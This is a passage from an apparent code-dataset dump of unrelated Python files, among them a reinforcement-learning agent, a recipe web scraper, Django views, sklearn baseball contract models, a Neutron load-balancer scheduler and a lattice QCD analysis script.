Connect to spectrum analyzer to see the result.\n\"\"\"\n\nclient = WieserlabsClient(\"10.0.0.237\", max_amp=17.38, loglevel=logging.INFO)\nclient.reset(0)\nclient.run(0)\n\nclient.frequency_ramp(slot_index=0, channel=0,\n fstart=1e6, fend=2e6,\n amp=1,\n phase=0,\n tramp=1,\n fstep=1, is_filter=False)\n\nclient.run(0)\n","sub_path":"examples/frequency_ramp.py","file_name":"frequency_ramp.py","file_ext":"py","file_size_in_byte":516,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"52"} +{"seq_id":"387387348","text":"from collections import deque\nimport random\nfrom tensorflow import keras\nimport numpy as np\nimport matplotlib.pyplot as pyplot\nfrom matplotlib import style\nimport objgraph\n\n\n\nclass TrainingAgent:\n def __init__(self, network_update_period,tau=0.1, model=None, epsilon=1, epsilon_decay=0.01, min_epsilon=0, gamma=0.99, runs=100, batch_size=10,\n steps_per_run=None):\n self.model = model\n self.memory = Memory(batch_size)\n self.epsilon = epsilon\n self.batch_size = batch_size\n self.epsilon_decay = epsilon_decay\n self.min_epsilon = min_epsilon\n self.gamma = gamma\n self.tau=tau\n self.runs = runs\n self.step_per_run = steps_per_run\n self.network_update_period=network_update_period\n self.actor = keras.Sequential(\n [\n keras.layers.Dense(128, input_dim=model.state_dim, activation=\"relu\"),\n keras.layers.Dense(256, activation=\"relu\"),\n keras.layers.Dense(256, activation=\"relu\"),\n keras.layers.Dense(128, activation=\"relu\"),\n keras.layers.Dense(model.action_dim, activation=\"linear\")\n ]\n )\n self.critic = keras.Sequential(\n [\n keras.layers.Dense(128, input_dim=model.state_dim, activation=\"relu\"),\n keras.layers.Dense(256, activation=\"relu\"),\n keras.layers.Dense(256, activation=\"relu\"),\n keras.layers.Dense(128, activation=\"relu\"),\n keras.layers.Dense(model.action_dim, activation=\"linear\")\n ]\n )\n\n# filepath=\"model.hdf5\"\n# checkpoint = keras.callbacks.ModelCheckpoint(filepath, monitor='accuracy', verbose=0, save_best_only=True, mode='max')\n# self.callbacks_list = [checkpoint]\n self.actor.compile(optimizer=\"adam\", loss=\"mse\", metrics=[\"accuracy\"])\n self.critic.compile(optimizer=\"adam\", loss=\"mse\", metrics=[\"accuracy\"])\n\n\n def run(self):\n run_rewards = []\n for run in range(self.runs):\n #print(\"Run # \", run)\n total_reward = 0\n self.epsilon=1-(float(run)/float(self.runs))\n current_state = self.model.initial_state\n terminate = False\n train_step_count = 0\n update_step_count=0\n run_step_count = 0\n while not terminate:\n action = 0\n #print(\"Day \",run_step_count)\n \n# if(run_step_count % self.batch_size ==0 or True):\n# #print(objgraph.show_most_common_types())\n# #print(objgraph.count('tuple'))\n# print(\"Day \",run_step_count)\n# print(objgraph.show_growth(limit=10))\n# all_objects = muppy.get_objects()\n# sum1 = summary.summarize(all_objects)\n# # Prints out a summary of the large objects\n# summary.print_(sum1)\n if np.random.rand() <= self.epsilon:\n # Pick random action\n\n action = random.randrange(self.model.action_dim)\n #print(\"Picking Random action: \",action)\n else:\n # Best Action\n action = np.argmax(self.actor.predict(np.array([current_state]))[0])\n #print(\"Picking Best action: \", action)\n #print(action)\n state, action, next_state, reward, terminal = self.model.model_logic(current_state, action)\n total_reward += reward\n self.memory.append((state, action, next_state, reward, terminal))\n train_step_count += 1\n #update_step_count+=1\n if 
train_step_count == self.batch_size:\n self.replay_train()\n train_step_count = 0\n #if update_step_count == self.network_update_period:\n # self.critic.set_weights(self.actor.get_weights())\n # self.update_step_count=0\n \n current_state = next_state\n run_step_count += 1\n if self.step_per_run is not None and run_step_count >= self.step_per_run:\n terminate = True\n run_rewards.append(total_reward)\n print(run, \":\", total_reward,\":\",self.epsilon)\n style.use(\"ggplot\")\n pyplot.scatter(range(0, len(run_rewards)), run_rewards)\n pyplot.xlabel(\"Run\")\n pyplot.ylabel(\"Total Reward\")\n pyplot.show()\n\n def update_critic(self):\n\n c=np.array(self.critic.get_weights());\n a=np.array(self.actor.get_weights());\n c=(c*(1-self.tau)) + (a*self.tau)\n #print(c)\n #print(\"---------------------------------------------------------------------------------------------------------------\")\n #print(self.critic.get_weights())\n self.critic.set_weights(c)\n \n def replay_train(self):\n batch = self.memory.sample(self.batch_size)\n #x=[]\n #y=[]\n for state, action, next_state, reward, terminal in batch:\n target = reward\n\n if not terminal:\n #target = reward + self.gamma * np.amax(self.q_network.predict(np.array([next_state]))[0])\n act=np.argmax(self.actor.predict(np.array([next_state]))[0])\n arr=(self.critic.predict(np.array([next_state]))[0])\n #print(act)\n #print(arr)\n target = reward+self.gamma *(arr[act])\n #print(target)\n\n target_f = self.actor.predict(np.array([state]))\n target_f[0][action] = target\n #print(target_f)\n #x.append(state)\n #y.append(target_f[0])\n self.actor.fit(np.array([state]), target_f, epochs=1, verbose=0)\n \n self.update_critic()\n\n keras.backend.clear_session()\n #self.q_network.fit(np.array(x), np.array(y),batch_size=self.batch_size, epochs=1, verbose=0)\n\n # if self.epsilon > self.min_epsilon:\n # self.epsilon -= self.epsilon_decay\n # if self.epsilon < self.min_epsilon:\n # self.epsilon = self.min_epsilon\n # else:\n # self.epsilon = self.min_epsilon\n\n\nclass Memory:\n def __init__(self, max_size):\n self.memory = deque(maxlen=max_size)\n\n def append(self, element):\n self.memory.append(element)\n\n def sample(self, n):\n return random.sample(self.memory, n)\n","sub_path":"VMIwithDRL/src/agent_model/training_agent_double.py","file_name":"training_agent_double.py","file_ext":"py","file_size_in_byte":6543,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"52"} +{"seq_id":"611781855","text":"#! 
/usr/bin/env python3\n# Auth: Jennifer Chang\n# Auth: Michael Zeller\n# Date: 2018/04/05\n# -*- coding: utf-8 -*-\n\nfrom selenium import webdriver\nfrom selenium.webdriver.common.by import By\nimport time\nimport numpy as np\n\n# ============================= Functions\ndef probe_world_cuisine(year,br):\n # Scrape URLS for recipes\n urls = br.find_elements(By.CLASS_NAME, \"favorite\") \n id = []\n for i, e in enumerate(urls):\n id.append(e.get_attribute('data-id')) \n urls[i] = 'https://allrecipes.com/recipe/' + str(id[i])\n urls = np.unique(urls)\n id = np.unique(id)\n \n f = open(year+'.txt', 'w')\n \n # Fetch ingredients\n for i, url in enumerate(urls):\n br.get(url)\n print('website\\t'+url+'\\t'+year)\n #f.write('website\\t'+url+'\\t'+year+'\\n') # MZ: Avoid writing to file for easier processing; JC: agree\n time.sleep(3)\n scrape_recipe(br, year, id[i],f)\n \n f.close\n \n print(\"==== Saved to \"+year+\".txt\")\n \ndef scrape_recipe(br, year, idnumber,f):\n try:\n rtitle = br.find_element_by_tag_name('h1').text\n except:\n rtitle = 'NA'\n\n print('recipe\\t'+idnumber+'\\t'+rtitle+'\\t'+year)\n \n ingred = br.find_elements_by_class_name(\"checkList__item\")\n ingredients = []\n for x in np.arange(len(ingred)-1):\n #if (str(ingred[x].text) == '')\n ingredients.append(str(ingred[x].text.encode('ascii', 'ignore')).replace(\"b'\",\"\").replace(\"'\",\"\"))\n \n for ingr in ingredients:\n print('ingred\\t'+rtitle+'\\t'+idnumber+'\\t'+ingr+'\\t'+year)\n f.write('ingred\\t'+rtitle+'\\t'+idnumber+'\\t'+ingr+'\\t'+year+'\\n')\n \n# ============================= Main\n# Open browser\nbr=webdriver.Firefox() #opens Firefox browser \n\n# Choose country (or countries) by uncommenting their line (or lines)\nyear=[]\nyear.append(['Mexico','https://www.allrecipes.com/recipes/728/world-cuisine/latin-american/mexican'])\n#year.append(['Africa','https://www.allrecipes.com/recipes/226/world-cuisine/african'])\n#year.append(['England','https://www.allrecipes.com/recipes/705/world-cuisine/european/uk-and-ireland/english'])\n#year.append(['China\"','https://www.allrecipes.com/recipes/695/world-cuisine/asian/chinese'])\n#year.append(['Philippines','https://www.allrecipes.com/recipes/696/world-cuisine/asian/filipino'])\n#year.append(['France','https://www.allrecipes.com/recipes/721/world-cuisine/european/french'])\n#year.append(['Germany','https://www.allrecipes.com/recipes/722/world-cuisine/european/german'])\n#year.append(['India','https://www.allrecipes.com/recipes/233/world-cuisine/asian/indian'])\n#year.append(['Italy','https://www.allrecipes.com/recipes/723/world-cuisine/european/italian'])\n#year.append(['Japan','https://www.allrecipes.com/recipes/699/world-cuisine/asian/japanese/'])\n#year.append(['Korea','https://www.allrecipes.com/recipes/700/world-cuisine/asian/korean'])\n#year.append(['Pakistani','https://www.allrecipes.com/recipes/15974/world-cuisine/asian/pakistani'])\n#year.append(['Russia','https://www.allrecipes.com/recipes/716/world-cuisine/european/eastern-european/russian'])\n\n# Fetch recipes\nfor country in year:\n print('==== Fetching recipes from ',country[0])\n br.get(country[1])\n probe_world_cuisine(country[0],br)\n","sub_path":"scrape.py","file_name":"scrape.py","file_ext":"py","file_size_in_byte":3254,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"52"} +{"seq_id":"547034860","text":"from django.shortcuts import render\nfrom django.views.generic import ListView, DetailView\nimport electives.models as models\nfrom .review import 
UserReviewForm\nfrom django.shortcuts import redirect\n\n\n# View where one can search for electives\ndef search(request):\n all_electives = models.Elective.objects.all()\n return render(request, 'electives/search.html', {\n 'all_electives': all_electives,\n 'languages': models.Elective.LANGUAGE_CHOICES,\n 'utblocks': models.Elective.UT_BLOCK_CHOICES,\n 'elective_types': models.Elective.ELECTIVE_TYPE_CHOICES, })\n\n\n# View of search results\nclass SearchResultsView(ListView):\n template_name = 'electives/search_results.html'\n\n def get_queryset(self):\n \"\"\"Return all electives satisfying the search\"\"\"\n title = self.request.GET.get('title')\n ec = self.request.GET.get('ec')\n utblock = self.request.GET.get('utblock')\n language = self.request.GET.get('language')\n electivetype = self.request.GET.get('electivetype')\n osiriscode = self.request.GET.get('osiriscode')\n keywords = self.request.GET.get('keywords')\n result = models.search(title=title, ec=ec, utblock=utblock, language=language, electivetype=electivetype,\n osiriscode=osiriscode, keywords=keywords)\n return result\n\n\n# Detail view of an elective\nclass ElectiveDetailView(DetailView):\n model = models.Elective\n template_name = 'electives/detail.html'\n\n\ndef user_review_view(request):\n form = UserReviewForm(request.POST or None)\n if form.is_valid():\n form.save()\n return redirect('electives:thanks')\n context = {\n 'form': form \n }\n return render(request, \"electives/user_review.html\", context)\n\n\ndef thank_you_view(request, *args, **kwargs):\n return render(request, \"electives/thank_you.html\", {})\n","sub_path":"electives/views.py","file_name":"views.py","file_ext":"py","file_size_in_byte":1907,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"52"} +{"seq_id":"339040871","text":"# Import important packages (mostly sklearn)\nimport pandas as pd\nimport pickle\nimport matplotlib.pyplot as plt\nimport numpy as np\n# Import GLM\nfrom sklearn.linear_model import LinearRegression\nfrom sklearn.linear_model import LogisticRegression\n# Import RF\nfrom sklearn.ensemble import RandomForestClassifier\n# Import RSME\nfrom sklearn.metrics import mean_squared_error\n# Import Classification metrics\nfrom sklearn.metrics import classification_report\nfrom sklearn.metrics import confusion_matrix\n\n# Load the saved data\ndef loadAllData():\n '''Load both saved data frames for use in the models'''\n\n # Load pitchers\n with open('/home/ubuntu/Github/MLB_FA_Predictor/mlb_flask_app/pitching_data.pickle', 'rb') as file:\n pitcher_all = pickle.load(file)\n\n # Load position players\n with open('/home/ubuntu/Github/MLB_FA_Predictor/mlb_flask_app/position_data.pickle', 'rb') as file:\n position_all = pickle.load(file)\n\n return pitcher_all, position_all\n\n# Define data preparation function\ndef prepareFreeAgentData(df):\n '''Given one of the 2 player data frames, prepare it for ML'''\n\n # Create position one-hot configuration\n df = pd.get_dummies(df, columns = ['Position'], prefix= ['Pos'])\n\n # Create Contract logical variable\n df['Contract'] = df.Dollars.notnull()\n\n # Create AAV variable\n df['AAV_2006'] = df.Dollars_2006.divide(df.Length)\n\n return df\n\n# Define the data splitting function\ndef splitDataByYear(df, year, player_type):\n\n # Break them into data frames and drop 2017 from training\n df_test = df[df.Year == year]\n df_train = df[(df.Year != year) & (df.Year != 2017)]\n\n # Determine the features\n if player_type == 'pitcher':\n features = ['Age', 'WAR_3', 'ERA', 
'WHIP', 'K_9', 'HR_9', 'IPouts',\n 'W', 'SV', 'Med_WAR', 'Min_WAR', 'Pos_SP', 'Pos_RP']\n else:\n features = ['Age', 'WAR_3', 'G', 'OBP', 'SLG', 'HR', 'RBI', 'SB',\n 'Med_WAR', 'Min_WAR', 'Pos_C', 'Pos_1B', 'Pos_2B', 'Pos_3B',\n 'Pos_SS', 'Pos_LF', 'Pos_CF', 'Pos_RF', 'Pos_DH']\n\n # Create the 4 sets of data; X's are arrays, y's are DFs for now\n X_train = df_train[features].values\n X_test = df_test[features].values\n y_train = df_train[['AAV_2006','Length','Contract']]\n y_test = df_test[['AAV_2006','Length','Contract', 'Dollars']]\n\n return X_train, y_train, X_test, y_test \n\n# Define the contract function (LogisticRegression)\ndef predictContract(X_train, y_train, X_test):\n\n # Grab the y values\n y_train_values = y_train['Contract'].values\n \n # Designate a logistic regression model\n logr = LogisticRegression()\n\n # Train the model\n logr.fit(X_train, y_train_values)\n\n y_pred = logr.predict(X_test) \n \n return logr, y_pred\n\n# Define the length function (rf classification)\ndef predictLength(X_train, y_train, X_test):\n\n # Shorten training to only non-null dollars\n idx = y_train.AAV_2006.notnull()\n y_train = y_train[idx]\n X_train = X_train[idx]\n\n # Grab the y values\n y_train_values = y_train['Length'].values\n \n # Designate a logistic regression model\n rfc = RandomForestClassifier()\n\n # Train the model\n rfc.fit(X_train, y_train_values)\n\n y_pred = rfc.predict(X_test) \n \n return rfc, y_pred\n\n# Define the dollars function (linear regression)\ndef predictDollars(X_train, y_train, X_test):\n\n # Shorten training to only non-null dollars\n idx = y_train.AAV_2006.notnull()\n y_train = y_train[idx]\n X_train = X_train[idx]\n\n # Grab the y values\n y_train_values = y_train['AAV_2006'].values\n \n # Designate a logistic regression model\n lm = LinearRegression()\n\n # Train the model\n lm.fit(X_train, y_train_values)\n\n y_pred = lm.predict(X_test) \n \n return lm, y_pred\n","sub_path":"models.py","file_name":"models.py","file_ext":"py","file_size_in_byte":3817,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"52"} +{"seq_id":"612209444","text":"from django.db import models\nfrom django.conf import settings\n\nfrom .base import BaseModel\n\n\nclass Device(BaseModel):\n ANDROID, IOS = range(2)\n DEVICE_TYPES = (\n (ANDROID, 'Android'),\n (IOS, 'iOS')\n )\n\n user = models.ForeignKey(\n settings.AUTH_USER_MODEL,\n on_delete=models.CASCADE,\n related_name=\"devices\"\n )\n token = models.CharField(max_length=255)\n device_type = models.SmallIntegerField(\n choices=DEVICE_TYPES, default=ANDROID)\n","sub_path":"loto/apps/mobile_api/models/device.py","file_name":"device.py","file_ext":"py","file_size_in_byte":496,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"52"} +{"seq_id":"454019317","text":"import agate\nimport util\n\nio = '../../io/'\n\n# load in all boston data as type text\ntt = agate.Text()\n\ncol_names = ['network','market','start_time', 'end_time', 'archive_id','sponsor','candidate','embed_url']\ncol_types = [tt, tt, tt, tt, tt, tt, tt, tt]\n\nbos = agate.Table.from_csv(io + 'bos.csv', column_names = col_names, column_types = col_types)\n\nsponsors = agate.Table.from_csv(io + 'sponsors_manual.csv')\nnew_sponsors = bos.select(['sponsor']).distinct('sponsor')\n\n\ndef get_candidate_from_sponsors(row):\n sponsor_row = sponsors.find(lambda r: r['sponsor'] == row['sponsor'])\n if sponsor_row:\n return sponsor_row['candidate']\n return None\n\n\n# check if we need to manually add a new 
sponsor / candidate relationship\nif len(sponsors.rows) != len(new_sponsors.rows):\n new_sponsors.to_csv(io + 'sponsors_latest.csv')\n print('New sponsors added. Update sponsors_manual.csv to continue.')\n\nelse: \n # create proper EST units for start/end times\n # create links to video and transcript files\n # create for_candidate name\n \n date_pattern = '%Y-%m-%d %H:%M:%S'\n base_url = 'https://archive.org/download/'\n\n with_new_fields = bos.compute([\n ('start_time_est', \n agate.Formula(agate.DateTime(), lambda row: util.get_est(row['start_time'], date_pattern))\n ),\n ('end_time_est',\n agate.Formula(agate.DateTime(), lambda row: util.get_est(row['end_time'], date_pattern))\n ),\n ('video',\n agate.Formula(agate.Text(), lambda row: base_url + row['archive_id'] + '/' + row['archive_id'] + '.mp4')\n ),\n ('transcript',\n agate.Formula(agate.Text(), lambda row: base_url + row['archive_id'] + '/transcript.txt')\n ),\n ('for_candidate',\n agate.Formula(agate.Text(), get_candidate_from_sponsors)\n )\n ])\n \n # write full appended data set (only write columns that are useful for all spot analysis)\n custom = with_new_fields.exclude(['market','start_time','end_time','video','transcript','embed_url'])\n custom.to_csv(io + 'bos_custom.csv')\n\n # unique ads for meta info, remove things that pertain to specific spot airing\n unique = with_new_fields.distinct('archive_id')\n unique_select = unique.select(['archive_id','sponsor','candidate','for_candidate','embed_url','video','transcript'])\n unique_select.to_csv(io + 'ads.csv')\n\n # json for downloading video script \n unique.select(['archive_id', 'video', 'transcript']).to_json(io + 'ads.json')\n","sub_path":"data/scripts/python/custom.py","file_name":"custom.py","file_ext":"py","file_size_in_byte":2524,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"52"} +{"seq_id":"307188699","text":"##############################################################################\n# This Source Code Form is subject to the terms of the Mozilla Public\n# License, v. 2.0. If a copy of the MPL was not distributed with this\n# file, You can obtain one at http://mozilla.org/MPL/2.0/.\n#\n# Copyright 2014 by F5 Networks and/or its suppliers. 
All rights reserved.\n##############################################################################\n\nfrom neutron.services.loadbalancer import agent_scheduler\nfrom neutron.openstack.common import log as logging\n\nLOG = logging.getLogger(__name__)\n\nimport random\n\n\nclass TenantScheduler(agent_scheduler.ChanceScheduler):\n    \"\"\"Allocate a loadbalancer agent for a pool based on tenant_id,\n    or else make a random choice.\n    \"\"\"\n\n    def schedule(self, plugin, context, pool):\n        \"\"\"Schedule the pool to an active loadbalancer agent if there\n        is no enabled agent hosting it.\n        \"\"\"\n        with context.session.begin(subtransactions=True):\n            lbaas_agent = plugin.get_lbaas_agent_hosting_pool(\n                context, pool['id'])\n            if lbaas_agent:\n                LOG.debug(_('Pool %(pool_id)s has already been hosted'\n                            ' by lbaas agent %(agent_id)s'),\n                          {'pool_id': pool['id'],\n                           'agent_id': lbaas_agent['id']})\n                return\n\n            candidates = plugin.get_lbaas_agents(context, active=True)\n            if not candidates:\n                LOG.warn(_('No active lbaas agents for pool %s'), pool['id'])\n                return\n\n            chosen_agent = None\n            for candidate in candidates:\n                assigned_pools = plugin.list_pools_on_lbaas_agent(\n                    context, candidate['id'])\n                for assigned_pool in assigned_pools['pools']:\n                    if pool['tenant_id'] == assigned_pool['tenant_id']:\n                        chosen_agent = candidate\n                        break\n                if chosen_agent:\n                    break\n\n            if not chosen_agent:\n                chosen_agent = random.choice(candidates)\n\n            binding = agent_scheduler.PoolLoadbalancerAgentBinding()\n            binding.agent = chosen_agent\n            binding.pool_id = pool['id']\n            context.session.add(binding)\n            LOG.debug(_('Pool %(pool_id)s is scheduled to '\n                        'lbaas agent %(agent_id)s'),\n                      {'pool_id': pool['id'],\n                       'agent_id': chosen_agent['id']})\n            return chosen_agent\n","sub_path":"neutron/services/loadbalancer/drivers/f5/agent_scheduler.py","file_name":"agent_scheduler.py","file_ext":"py","file_size_in_byte":2605,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"52"} +{"seq_id":"540460232","text":"# I will use the Euclidean algorithm to calculate the GCD and LCM\r\n# https://en.wikipedia.org/wiki/Euclidean_algorithm\r\n\r\n\r\ndef GCD(a,b): # by the Euclidean algorithm, the GCD follows from the remainder of a/b (a>b)\r\n    if a%b ==0: # if the remainder of a/b is zero, b is the GCD of the original a & b\r\n        return b\r\n    else: # otherwise GCD(b, a%b) equals the GCD of the original a & b\r\n        return GCD(b,a%b) # recursive call\r\n\r\n\r\ndef LCM(a,b): # LCM is the \"Least Common Multiple\": a*b divided by GCD(a,b) gives the LCM\r\n    return int(a*b/GCD(a,b))\r\n\r\n\r\ninput_numbers = list(map(int, input(\"Please Enter two integers: \").split(' '))) # input two numbers separated by a space\r\n# split on the space and convert the string list to an int list using map\r\ninput_numbers.sort(reverse=True) # sort the list in descending order\r\nprint(\"LCM : {} GCD : {}\".format(LCM(input_numbers[0], input_numbers[1]), GCD(input_numbers[0], input_numbers[1])))
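\r\n\r\n# Worked example (illustrative values, not from the assignment):\r\n#   GCD(48, 18) -> GCD(18, 12) -> GCD(12, 6) -> 6,\r\n#   so LCM(48, 18) = 48*18/6 = 144.\r\n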
","sub_path":"Junior_1st_Semester/Artificial_Intelligence_Project/hw/2016314726_정영준_week1_hw3.py","file_name":"2016314726_정영준_week1_hw3.py","file_ext":"py","file_size_in_byte":1027,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"52"} +{"seq_id":"343745139","text":"'''Given a file, determine how many letters (of the Latin alphabet), words, and lines it contains.\nPrint the three numbers found, in the format shown in the example.\n'''\nwith open(\"input.txt\", \"r\") as f:\n    ALL = list()\n    for line in f.readlines():\n        if line[0] == \"\\n\":\n            continue\n        L = list(line.strip('.\\n').split())\n        ALL.append(L)\n    count_words = 0\n    count_letters = 0\n    for line in ALL:\n        count_words += len(line)\n        for word in line:\n            count_letters += len(word)\n    print(count_letters, \"letters\")\n    print(count_words, \"words\")\n    print(len(ALL), \"lines\")\n","sub_path":"tasks/Files_Tasks/Task3.py","file_name":"Task3.py","file_ext":"py","file_size_in_byte":712,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"52"} +{"seq_id":"144981109","text":"import pandas as pd\n\n\ndf = pd.read_csv(\"./csv/1_sentence_tokenized_reviews.csv\")\nsentence_tokenized_reviews = df.values\n\n\n# Clean up punctuation\nimport re\n\n\npunct = \"/-'?!.,#$%\\'()*+-/:;<=>@[\\\\]^_`{|}~\" + '\"\"“”’' + '∞θ÷α•à−β∅³π‘₹´°£€\\×™√²—–&'\npunct_mapping = {\"‘\": \"'\", \"₹\": \"e\", \"´\": \"'\", \"°\": \"\", \"€\": \"e\", \"™\": \"tm\", \"√\": \" sqrt \", \"×\": \"x\", \"²\": \"2\", \"—\": \"-\", \"–\": \"-\", \"’\": \"'\", \"_\": \"-\", \"`\": \"'\", '“': '\"', '”': '\"', '“': '\"', \"£\": \"e\", '∞': 'infinity', 'θ': 'theta', '÷': '/', 'α': 'alpha', '•': '.', 'à': 'a', '−': '-', 'β': 'beta', '∅': '', '³': '3', 'π': 'pi', }\n\n\ndef clean_punc(text, punct, mapping):\n    for p in mapping:\n        text = re.sub(p, mapping[p], text)\n    \n    # for p in punct:\n    #     text = re.sub(p, f' {p} ', text)\n    \n    specials = {'\u200b': ' ', '…': ' ... ', '\ufeff': '', 'करना': '', 'है': ''}\n    for s in specials:\n        text = re.sub(s, specials[s], text)\n    \n    return text.strip()\n\n\ncleaned_reviews = []\nfor sentence_tokenized_review in sentence_tokenized_reviews:\n\n    cleaned_review = []\n    for sent in sentence_tokenized_review:\n        cleaned_review.append(clean_punc(str(sent), punct, punct_mapping))\n\n    cleaned_reviews.append(cleaned_review)\n\n\n# save the cleaned reviews, not the raw input\ndf = pd.DataFrame(cleaned_reviews)\ndf.to_csv(\"./csv/2_cleaned_reviews.csv\", index=False)","sub_path":"pjt2/MechineLearning/etc/사전학습/전처리/test2/2_cleaned.py","file_name":"2_cleaned.py","file_ext":"py","file_size_in_byte":1396,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"52"} +{"seq_id":"295138333","text":"from labrad.server import LabradServer, setting\n\nclass ExternalServer(LabradServer):\n    \"\"\"External Server to test the blocking function.\"\"\"\n    name = \"External Server\"\n\n    currentNumber = 0\n\n    def updateNumber(self):\n        self.currentNumber += 1\n\n    @setting(10, \"Get Number\", returns=\"i\")\n    def getNumber(self, c, data):\n        \"\"\"Update and get the number.\"\"\"\n        self.updateNumber()\n        return self.currentNumber\n\nif __name__ == \"__main__\":\n    from labrad import util\n    util.runServer(ExternalServer())","sub_path":"old_files/scriptcontrol/prototype/externalserver.py","file_name":"externalserver.py","file_ext":"py","file_size_in_byte":528,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"52"} +{"seq_id":"57942757","text":"import sys\nsys.path.append(\"/Users/njlindsey/Workspace/projectsBerkeley/AmbientNoiseGreenFunctions/\")\nimport progs.core as core\nimport progs.eigCalc as eigCalc\nimport progs.eigPlot as eigPlot\nimport numpy as np\n\n\n#inputs\nmodelfile=\"MODEL.01\"\ndistancefile=\"DIST\"\nfreqfile=\"FREQ\"\n\n#generate array of frequencies\nfreqs=core.mungeFreq(freqfile)\n\n#generate eigenfunctions using 
CPS\neigCalc.calcLove(modelfile,distancefile,freqfile)\neigCalc.calcRay(modelfile,distancefile,freqfile)\n\n#read eigenfunctions from ascii into a numpy array\nwith open('SLDER.TXT','r') as lovedispfile:\n [headerL,paramsL,dataL]=eigCalc.mungeEig(lovedispfile)\nwith open('SRDER.TXT','r') as raydispfile:\n [headerR,paramsR,dataR]=eigCalc.mungeEig(raydispfile)\n\n#plot dispersion\nfig1=eigPlot.Dispersion(freqs,paramsL,paramsR);\n\n#plot eigenfunctions\nfig2=eigPlot.Eigenfunctions(freqs,headerL,headerR,dataL,dataR);\n","sub_path":"tests/GIL7/eigCalcRun.py","file_name":"eigCalcRun.py","file_ext":"py","file_size_in_byte":885,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"52"} +{"seq_id":"623625592","text":"import os\nimport sys\nimport argparse\nimport numpy as np\nimport subprocess\nimport matplotlib\nmatplotlib.use('Agg')\nimport matplotlib.pyplot as plt\nsys.path.append('lib/')\nimport analysis_utils as au\nfrom scipy.optimize import curve_fit\n\n#### define macros #########\nI=complex(0.,1.)\nsqrt=np.sqrt\nlog=np.log\nfrom math import pi as PI\nmatr = np.matrix\n###########################\n\ngt_ch = np.array([[ 0, 0, -1, 0],\n [ 0, 0, 0, -1],\n [ -1, 0, 0, 0],\n [ 0, -1, 0, 0]])\n\ng5_ch = np.array([[ 1, 0, 0, 0],\n [ 0, 1, 0, 0],\n [ 0, 0,-1, 0],\n [ 0, 0, 0,-1]])\n\nProj = 0.25*(np.eye(4) + gt_ch)\n\ndef assertions(args):\n parameters={}\n parameters['listConfs'] = args['listConfs']\n parameters['twop'] = args['twop']\n parameters['threep'] = args['threep']\n parameters['L'] = int(args['L'])\n parameters['T'] = int(args['T'])\n parameters['binsize'] = int(args['binsize'])\n parameters['tsink'] = int(args['tsink'])\n parameters['fitMassLow'] = int(args['fitMassLow'])\n parameters['fitMassHgh'] = int(args['fitMassHgh'])\n parameters['fitThpLow'] = int(args['fitThpLow'])\n parameters['fitThpHgh'] = int(args['fitThpHgh'])\n parameters['momentum'] = int(args['momentum'])\n\n assert parameters['L']>0\n assert parameters['T']>0\n assert parameters['binsize']>0\n assert parameters['tsink']>=0 and parameters['tsink'] < parameters['T']/2\n assert parameters['fitMassLow'] >0 and parameters['fitMassLow'] < parameters['T']/2\n assert parameters['fitMassHgh'] >0 and parameters['fitMassHgh'] < parameters['T']/2 and parameters['fitMassHgh'] > parameters['fitMassLow']\n assert parameters['fitThpLow'] > 0 and parameters['fitThpLow'] < parameters['tsink']\n assert parameters['fitThpHgh'] > 0 and parameters['fitThpHgh'] < parameters['tsink'] and parameters['fitThpHgh'] > parameters['fitThpLow']\n assert parameters['momentum'] > 0\n\n return parameters\n##################################################\n\ndef main(argv=None):\n if argv is None:\n argv = sys.argv\n\n parser = argparse.ArgumentParser(prog='PDFs Helicity', description='This code analyzes the PDFs for the helicity')\n parser.add_argument('--listConfs', help='Takes the list of configurations that we want to analysze', default = 'list_confs.txt')\n parser.add_argument('--twop', help='Takes the prefix of the twop point function names for zero momentum', default = 'twop')\n parser.add_argument('--threep', help='Takes the prefix of the threep point function names', default = 'threep')\n parser.add_argument('--L', help='Spatial Lattice Extent', default = 16)\n parser.add_argument('--T', help='Temporal Lattice Extent', default = 32)\n parser.add_argument('--binsize', help='The binsize needed for the binning procedure', default = 1)\n parser.add_argument('--fitMassLow', help='Lower fit range for effective mass', 
default = 5)\n parser.add_argument('--fitMassHgh', help='Higher fit range for effective mass', default = 10)\n parser.add_argument('--tsink', help='Time slice where we fix the sink', default = 6)\n parser.add_argument('--fitThpLow', help='Lower fit range for three point ratio', default = 2)\n parser.add_argument('--fitThpHgh', help='Higher fit range for three point ratio', default = 4)\n parser.add_argument('--momentum', help='The momentum that we boost the nucleon', default = 1)\n args = vars(parser.parse_args())\n\n parameters=assertions(args)\n\n momP='+' + str(parameters['momentum'])\n momM='-' + str(parameters['momentum'])\n lMomenta=[[momP,'+0','+0'], ['+0',momP,'+0'], ['+0','+0',momP], [momM,'+0','+0'], ['+0',momM,'+0'], ['+0','+0',momM]]\n ldir=['x','y','z','x','y','z']\n lProj=['4','5','6','4','5','6']\n\n # read configurations list\n lenConf=au.file_len(parameters['listConfs'])\n with open(parameters['listConfs'],'r') as fp:\n listConfs = list(map(lambda x: x.strip(),fp.readlines()))\n if len(set(listConfs)) != lenConf:\n sys.stderr.write('Error there are duplicate confs in the list')\n sys.exit(-1)\n\n if lenConf % parameters['binsize'] != 0:\n sys.stderr.write('Error number of configurations is not divisible with the binsize: Manually discard confs to make it')\n sys.exit(-1) \n\n # read the two point functions for the zero momentum from where we extract the effective mass\n twopRaw_mom0=[]\n for iconf in listConfs:\n twopName = parameters['twop'] + iconf + '/twop_proton_mom_+0_+0_+0_zeta_-0.6000_dir_x.dat'\n lenFile = au.file_len(twopName)\n explen = parameters['T'] * 4\n if lenFile != explen:\n sys.stderr.write('Error wrong number of lines in %s' % (twopName))\n sys.exit(-1)\n arr=np.loadtxt(twopName, 